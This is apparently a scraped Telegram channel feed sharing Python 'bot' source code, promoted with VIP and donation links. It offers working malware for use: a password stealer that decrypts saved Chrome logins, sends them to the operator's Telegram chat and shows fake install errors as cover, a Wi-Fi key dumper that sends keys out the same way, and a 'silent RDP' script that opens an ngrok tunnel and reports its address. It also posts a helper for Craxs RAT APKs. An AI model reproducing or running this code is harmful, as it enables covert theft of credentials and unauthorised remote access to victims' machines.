IP Port Extractor for Craxs RAT APK (Android Remote Tool)
β¨ JOIN VIP (Fix errors and add more features)
#telegrambot
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
β¨ JOIN VIP (Fix errors and add more features)
import os
import base64
import hashlib
import tempfile
import glob
import re
import subprocess
from telegram import Update
from telegram.ext import Application, CommandHandler, MessageHandler, filters, CallbackContext
# Replace this with your actual bot token
TELEGRAM_BOT_TOKEN = 'CHANGE_ME_AUTH'
def calculate_md5(file_path):
hash_md5 = hashlib.md5()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def decode_base64(encoded_str):
padded_str = encoded_str + '=' * (-len(encoded_str) % 4)
decoded_bytes = base64.b64decode(padded_str)
return decoded_bytes.decode('utf-8')
def extract_ips_and_ports_from_apk(apk_path):
md5_hash = calculate_md5(apk_path)
results = []
with tempfile.TemporaryDirectory() as temp_dir:
result = subprocess.run(['jadx', '--no-res', '-d', temp_dir, apk_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if result.returncode != 0:
return "Error: jadx failed to decompile the APK."
java_files = glob.glob(os.path.join(temp_dir, '**', '*.java'), recursive=True)
client_host_pattern = re.compile(r'public\s+static\s+String\s+ClientHost\s*=\s*"([A-Za-z0-9+/=]+)"')
client_port_pattern = re.compile(r'public\s+static\s+String\s+ClientPort\s*=\s*"([A-Za-z0-9+/=]+)"')
for file_path in java_files:
with open(file_path, 'r', encoding='utf-8') as file:
content = file.read()
host_matches = client_host_pattern.findall(content)
port_matches = client_port_pattern.findall(content)
if host_matches and port_matches:
host_base64 = host_matches[0]
port_base64 = port_matches[0]
try:
decoded_host = decode_base64(host_base64)
decoded_port = decode_base64(port_base64)
message = (f"IP: {decoded_host}\n"
f"Port: {decoded_port}\n"
f"Join: @EFXTV")
results.append(message)
except Exception as e:
results.append(f"Error decoding base64 strings: {e}")
return "\n\n".join(results) if results else "No IPs or Ports found."
async def start(update: Update, context: CallbackContext):
await update.message.reply_text("Send me an APK file and I'll extract the IP and port information.")
async def handle_document(update: Update, context: CallbackContext):
file = update.message.document
file_id = file.file_id
file_name = file.file_name
file_path = os.path.join(tempfile.gettempdir(), file_name)
try:
# Get the file object
telegram_file = await context.bot.get_file(file_id)
# Download the file
await telegram_file.download_to_drive(file_path)
# Process the APK file
message = extract_ips_and_ports_from_apk(file_path)
# Send the result back to the user
await update.message.reply_text(message)
except Exception as e:
await update.message.reply_text(f"An error occurred: {e}")
finally:
# Clean up the temporary file
if os.path.exists(file_path):
os.remove(file_path)
def main():
application = Application.builder().token(TELEGRAM_BOT_TOKEN).build()
application.add_handler(CommandHandler('start', start))
application.add_handler(MessageHandler(filters.Document.MimeType("application/vnd.android.package-archive"), handle_document))
application.run_polling()
if __name__ == '__main__':
main()
#telegrambot
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
π14π₯6π3π€©2
Python Telegram Bots pinned Β«IP Port Extractor for Craxs RAT APK (Android Remote Tool) β¨ JOIN VIP (Fix errors and add more features) import os import base64 import hashlib import tempfile import glob import re import subprocess from telegram import Update from telegram.ext import Applicationβ¦Β»
Python Telegram Bots pinned Β«Files2Telegram Bot_Public Must create a directory Files2Telegram and copy files Add your bot to Public Group or Channel β¨ JOIN VIP import argparse import os import asyncio from telegram import Bot from telegram.error import TelegramError BOT_TOKEN = 'YOUR_BOT_TOKEN'β¦Β»
Python Telegram Bots pinned Β«IP Port Extractor for Craxs RAT APK (Android Remote Tool) β¨ JOIN VIP (Fix errors and add more features) import os import base64 import hashlib import tempfile import glob import re import subprocess from telegram import Update from telegram.ext import Applicationβ¦Β»
Thank you for your support! π
Join our Python 1000+ family and stay connected for updates.
Support us here π2: https://t.me/Best_AI_tools_everyday
Iβll work on bringing you more great tools soon!
Join our Python 1000+ family and stay connected for updates.
Support us here π2: https://t.me/Best_AI_tools_everyday
Iβll work on bringing you more great tools soon!
π3
Python Telegram Bots pinned Β«Thank you for your support! π Join our Python 1000+ family and stay connected for updates. Support us here π2: https://t.me/Best_AI_tools_everyday Iβll work on bringing you more great tools soon!Β»
SILENT RDP Telegram Bot Source in Python
Enable RDP and gain silent access to your PC 24/7 via a Telegram bot
β¨ JOIN VIP (Fix errors and add more features)
#telegrambot #rdp
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
Enable RDP and gain silent access to your PC 24/7 via a Telegram bot
β¨ JOIN VIP (Fix errors and add more features)
import requests
import json
import socket
import zipfile
import subprocess
import time
import os
from pathlib import Path
import asyncio
from telegram import Bot
TELEGRAM_TOKEN = 'CHANGE_ME'
CHAT_ID = 'CHANGE_ME'
async def send_to_telegram(message):
bot = Bot(token=TELEGRAM_TOKEN)
await bot.send_message(chat_id=CHAT_ID, text=message)
def startng():
ngrok_path = r'C:\temp\ngrok\ngrok.exe'
command = [ngrok_path, 'tcp', '3389']
with open(r'C:\temp\ngrok\SAVEDLOG.TXT', 'w') as log_file:
process = subprocess.Popen(command, stdout=log_file, stderr=log_file)
time.sleep(7)
return
def notexist():
os.makedirs(r'C:\temp\ngrok', exist_ok=True)
url = "https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip"
output_path = r"C:\temp\ngrok\ngrok.zip"
extract_dir = r"C:\temp\ngrok"
response = requests.get(url, stream=True)
with open(output_path, "wb") as file:
for chunk in response.iter_content(chunk_size=8192):
file.write(chunk)
with zipfile.ZipFile(output_path, 'r') as zip_ref:
zip_ref.extractall(extract_dir)
command = r'C:\temp\ngrok\ngrok.exe config add-authtoken YOUR_AUTHTOKEN' # Replace with your ngrok authtoken
with open(r'C:\temp\ngrok\SAVEDLOG.TXT', 'w') as log_file:
subprocess.run(command, stdout=log_file, stderr=log_file, shell=True)
return
def exist():
url = "http://localhost:4040/api/tunnels"
response = requests.get(url)
data = response.json()
public_url = data['tunnels'][0]['public_url']
result = public_url.replace('tcp://', '')
IP, PO = result.split(':')
ip_address = socket.gethostbyname(IP)
# Prepare the message to send to Telegram
output_message = f"> IP: {ip_address}\n> PO: {PO}"
# Run the async function to send the message to Telegram
asyncio.run(send_to_telegram(output_message))
return
a = Path(r"C:\temp\ngrok\ngrok.exe")
# Check if the file exists and call the respective function
if a.exists():
startng()
exist()
else:
notexist()
startng()
exist()
#telegrambot #rdp
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
π6β€2π1
Media is too big
VIEW IN TELEGRAM
SILENT RDP Telegram Bot Source in Python
Enable RDP and gain silent access to your PC (LAN/WAN) 24/7 via a Telegram bot
[+] No Network Loss
[+] 24/7 Connection
[+] Easy Remote PC Access
[+] Join VIP to Unlock 10+ Cool Features
Source Code for you ππ» Download Now
#telegrambot #rdp
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
Enable RDP and gain silent access to your PC (LAN/WAN) 24/7 via a Telegram bot
[+] No Network Loss
[+] 24/7 Connection
[+] Easy Remote PC Access
[+] Join VIP to Unlock 10+ Cool Features
Source Code for you ππ» Download Now
#telegrambot #rdp
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
π3
Python Telegram Bots pinned Β«SILENT RDP Telegram Bot Source in Python Enable RDP and gain silent access to your PC 24/7 via a Telegram bot β¨ JOIN VIP (Fix errors and add more features) import requests import json import socket import zipfile import subprocess import time import osβ¦Β»
Forwarded from Python Telegram Bots
IP Port Extractor for Craxs RAT APK (Android Remote Tool)
β¨ JOIN VIP (Fix errors and add more features)
#telegrambot
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
β¨ JOIN VIP (Fix errors and add more features)
import os
import base64
import hashlib
import tempfile
import glob
import re
import subprocess
from telegram import Update
from telegram.ext import Application, CommandHandler, MessageHandler, filters, CallbackContext
# Replace this with your actual bot token
TELEGRAM_BOT_TOKEN = 'CHANGE_ME_AUTH'
def calculate_md5(file_path):
hash_md5 = hashlib.md5()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def decode_base64(encoded_str):
padded_str = encoded_str + '=' * (-len(encoded_str) % 4)
decoded_bytes = base64.b64decode(padded_str)
return decoded_bytes.decode('utf-8')
def extract_ips_and_ports_from_apk(apk_path):
md5_hash = calculate_md5(apk_path)
results = []
with tempfile.TemporaryDirectory() as temp_dir:
result = subprocess.run(['jadx', '--no-res', '-d', temp_dir, apk_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if result.returncode != 0:
return "Error: jadx failed to decompile the APK."
java_files = glob.glob(os.path.join(temp_dir, '**', '*.java'), recursive=True)
client_host_pattern = re.compile(r'public\s+static\s+String\s+ClientHost\s*=\s*"([A-Za-z0-9+/=]+)"')
client_port_pattern = re.compile(r'public\s+static\s+String\s+ClientPort\s*=\s*"([A-Za-z0-9+/=]+)"')
for file_path in java_files:
with open(file_path, 'r', encoding='utf-8') as file:
content = file.read()
host_matches = client_host_pattern.findall(content)
port_matches = client_port_pattern.findall(content)
if host_matches and port_matches:
host_base64 = host_matches[0]
port_base64 = port_matches[0]
try:
decoded_host = decode_base64(host_base64)
decoded_port = decode_base64(port_base64)
message = (f"IP: {decoded_host}\n"
f"Port: {decoded_port}\n"
f"Join: @EFXTV")
results.append(message)
except Exception as e:
results.append(f"Error decoding base64 strings: {e}")
return "\n\n".join(results) if results else "No IPs or Ports found."
async def start(update: Update, context: CallbackContext):
await update.message.reply_text("Send me an APK file and I'll extract the IP and port information.")
async def handle_document(update: Update, context: CallbackContext):
file = update.message.document
file_id = file.file_id
file_name = file.file_name
file_path = os.path.join(tempfile.gettempdir(), file_name)
try:
# Get the file object
telegram_file = await context.bot.get_file(file_id)
# Download the file
await telegram_file.download_to_drive(file_path)
# Process the APK file
message = extract_ips_and_ports_from_apk(file_path)
# Send the result back to the user
await update.message.reply_text(message)
except Exception as e:
await update.message.reply_text(f"An error occurred: {e}")
finally:
# Clean up the temporary file
if os.path.exists(file_path):
os.remove(file_path)
def main():
application = Application.builder().token(TELEGRAM_BOT_TOKEN).build()
application.add_handler(CommandHandler('start', start))
application.add_handler(MessageHandler(filters.Document.MimeType("application/vnd.android.package-archive"), handle_document))
application.run_polling()
if __name__ == '__main__':
main()
#telegrambot
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
π3
π¨ Introducing the Chrome Password Decryptor Bot! π¨ P1
This bot is designed to help you recover your saved passwords from Google Chrome in a secure and easy way. It extracts and decrypts your saved login information from Chrome's encrypted storage, so you can get access to your credentials even if youβve forgotten them.
Pip installs are:
This bot is designed to help you recover your saved passwords from Google Chrome in a secure and easy way. It extracts and decrypts your saved login information from Chrome's encrypted storage, so you can get access to your credentials even if youβve forgotten them.
Pip installs are:
pip install pywin32
pip install requests
pip install pycryptodome
import os
import re
import sys
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import csv
import requests
import random
import time
CHROME_PATH_LOCAL_STATE = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data\Local State" % (os.environ['USERPROFILE']))
CHROME_PATH = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data" % (os.environ['USERPROFILE']))
TELEGRAM_BOT_TOKEN = "YOUR_BOT_API_TOKEN"
TELEGRAM_CHAT_ID = "YOUR_CHAT_ID"
def send_telegram_message(message):
url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendMessage"
payload = {
"chat_id": TELEGRAM_CHAT_ID,
"text": message,
}
try:
response = requests.post(url, data=payload)
response.raise_for_status()
except Exception as e:
print(f"Failed to send message to Telegram: {e}")
def get_secret_key():
try:
with open(CHROME_PATH_LOCAL_STATE, "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
secret_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
secret_key = secret_key[5:]
secret_key = win32crypt.CryptUnprotectData(secret_key, None, None, None, 0)[1]
return secret_key
except Exception as e:
print("%s" % str(e))
print("[ERR] Chrome secretkey cannot be found")
return None
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_password(ciphertext, secret_key):
try:
initialisation_vector = ciphertext[3:15]
encrypted_password = ciphertext[15:-16]
cipher = generate_cipher(secret_key, initialisation_vector)
decrypted_pass = decrypt_payload(cipher, encrypted_password)
decrypted_pass = decrypted_pass.decode()
return decrypted_pass
except Exception as e:
print("%s" % str(e))
print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")
return ""
def get_db_connection(chrome_path_login_db):
try:
return sqlite3.connect("Loginvault.db")
except Exception as e:
print("%s" % str(e))
print("[ERR] Chrome database cannot be found")
return None
def fake_error_message():
fake_messages = [
"Installation failed. Please retry later.",
"An unexpected error occurred during setup.",
"Error: Could not verify the installation process.",
"Setup encountered an error. Please reinstall."
]
print(random.choice(fake_messages))
β€2
π¨ Introducing the Chrome Password Decryptor Bot! π¨ P2
#telegrambot
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
if __name__ == '__main__':
try:
with open('decrypted_password.csv', mode='w', newline='', encoding='utf-8') as decrypt_password_file:
csv_writer = csv.writer(decrypt_password_file, delimiter=',')
csv_writer.writerow(["index", "url", "username", "password"])
secret_key = get_secret_key()
folders = [element for element in os.listdir(CHROME_PATH) if re.search("^Profile*|^Default$", element) != None]
for folder in folders:
chrome_path_login_db = os.path.normpath(r"%s\%s\Login Data" % (CHROME_PATH, folder))
conn = get_db_connection(chrome_path_login_db)
if(secret_key and conn):
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
for index, login in enumerate(cursor.fetchall()):
url = login[0]
username = login[1]
ciphertext = login[2]
if(url != "" and username != "" and ciphertext != ""):
decrypted_password = decrypt_password(ciphertext, secret_key)
csv_writer.writerow([index, url, username, decrypted_password])
message = f"<b>URL:</b> {url}\n<b>Username:</b> {username}\n<b>Password:</b> {decrypted_password}"
send_telegram_message(message)
cursor.close()
conn.close()
os.remove("Loginvault.db")
except Exception as e:
print("[ERR] %s" % str(e))
#telegrambot
#python_telegram_bot_source_codes
#python_telegram_bot_source_codes
π5β€βπ₯1β€1π1π₯1
Support My Work!
If you enjoy what I do and want to see more, consider buying me a coffee! Every donation helps me keep creating and growing.
Https://buymeacoffee.com/efxtv
Thank you for your support!
If you enjoy what I do and want to see more, consider buying me a coffee! Every donation helps me keep creating and growing.
Https://buymeacoffee.com/efxtv
Thank you for your support!
Python Telegram Bots pinned Β«Support My Work! If you enjoy what I do and want to see more, consider buying me a coffee! Every donation helps me keep creating and growing. Https://buymeacoffee.com/efxtv Thank you for your support!Β»
β‘ Need to send your Wi-Fi passwords directly to your Telegram bot? I just wrote a Python script that does exactly that cleanly and efficiently!
β‘ The script automatically fetches saved Wi-Fi passwords from your system (works on Windows and Linux) and sends them to a Telegram chat using the Bot API.
β‘ It uses standard libraries like subprocess, os, and json, along with the popular requests module to interact with Telegram.
β‘ Setup is easy: you just need to install requests (pip install requests), get your bot token from @BotFather, and know your chat ID.
β‘Once configured, the script will list all available Wi-Fi profiles with their passwords and send them neatly formatted to your Telegram account.
β‘ Itβs a practical tool for network audits, remote diagnostics, or just keeping a backup of Wi-Fi credentials.
#telegrambot
#python_telegram_bot_source_codes
Source Link π Visit me
Support My Work!
If you enjoy what I do and want to see more, consider buying me a coffee! Every donation helps me keep creating and growing.
Https://buymeacoffee.com/efxtv
Thank you for your support!
β‘ The script automatically fetches saved Wi-Fi passwords from your system (works on Windows and Linux) and sends them to a Telegram chat using the Bot API.
β‘ It uses standard libraries like subprocess, os, and json, along with the popular requests module to interact with Telegram.
β‘ Setup is easy: you just need to install requests (pip install requests), get your bot token from @BotFather, and know your chat ID.
β‘Once configured, the script will list all available Wi-Fi profiles with their passwords and send them neatly formatted to your Telegram account.
β‘ Itβs a practical tool for network audits, remote diagnostics, or just keeping a backup of Wi-Fi credentials.
#telegrambot
#python_telegram_bot_source_codes
Source Link π Visit me
Support My Work!
If you enjoy what I do and want to see more, consider buying me a coffee! Every donation helps me keep creating and growing.
Https://buymeacoffee.com/efxtv
Thank you for your support!
β€1
import subprocess
import requests
import os
import json
BOT_TOKEN = 'YOUR_BOT_TOKEN_HERE'
CHAT_ID = 'YOUR_CHAT_ID_HERE'
def get_wifi_passwords():
wifi_passwords = {}
platform = os.name
if platform == 'nt':
output = subprocess.check_output('netsh wlan show profiles', shell=True).decode()
profiles = [line.split(":")[1].strip() for line in output.split('\n') if "All User Profile" in line]
for profile in profiles:
try:
profile_info = subprocess.check_output(
f'netsh wlan show profile "{profile}" key=clear', shell=True
).decode()
password_lines = [line for line in profile_info.split('\n') if "Key Content" in line]
if password_lines:
password = password_lines[0].split(":")[1].strip()
else:
password = "No password found"
wifi_passwords[profile] = password
except subprocess.CalledProcessError:
wifi_passwords[profile] = "Could not retrieve password"
elif platform == 'posix':
nmcli_path = shutil.which("nmcli")
if nmcli_path:
try:
result = subprocess.check_output(['nmcli', '-t', '-f', 'NAME,SECURITY', 'connection', 'show']).decode()
networks = [line.split(":")[0] for line in result.strip().split('\n') if line]
for network in networks:
try:
passwd_result = subprocess.check_output(
['nmcli', '-s', '-g', '802-11-wireless-security.psk', 'connection', 'show', network]
).decode().strip()
if passwd_result:
wifi_passwords[network] = passwd_result
else:
wifi_passwords[network] = "No password set or not found"
except subprocess.CalledProcessError:
wifi_passwords[network] = "Could not retrieve password"
except Exception as e:
wifi_passwords["error"] = f"Error: {str(e)}"
else:
wifi_passwords["error"] = "nmcli not found on system."
else:
wifi_passwords["error"] = "Unsupported operating system"
return wifi_passwords
def send_to_telegram(message):
url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
payload = {
'chat_id': CHAT_ID,
'text': message,
'parse_mode': 'Markdown'
}
response = requests.post(url, data=payload)
if response.status_code == 200:
print("Successfully sent to Telegram.")
else:
print(f"Failed to send message: {response.status_code}, {response.text}")
def main():
wifi_data = get_wifi_passwords()
if "error" in wifi_data:
send_to_telegram(f"Error fetching WiFi passwords: {wifi_data['error']}")
else:
formatted_message = "*WiFi Passwords:*\n\n"
for wifi, password in wifi_data.items():
formatted_message += f"`{wifi}` : `{password}`\n"
send_to_telegram(formatted_message)
if __name__ == "__main__":
main()
π₯5π2
Support My Work!
If you enjoy what I do and want to see more, consider buying me a coffee! Every donation helps me keep creating and growing.
Https://buymeacoffee.com/efxtv
Thank you for your support!
If you enjoy what I do and want to see more, consider buying me a coffee! Every donation helps me keep creating and growing.
Https://buymeacoffee.com/efxtv
Thank you for your support!
β€3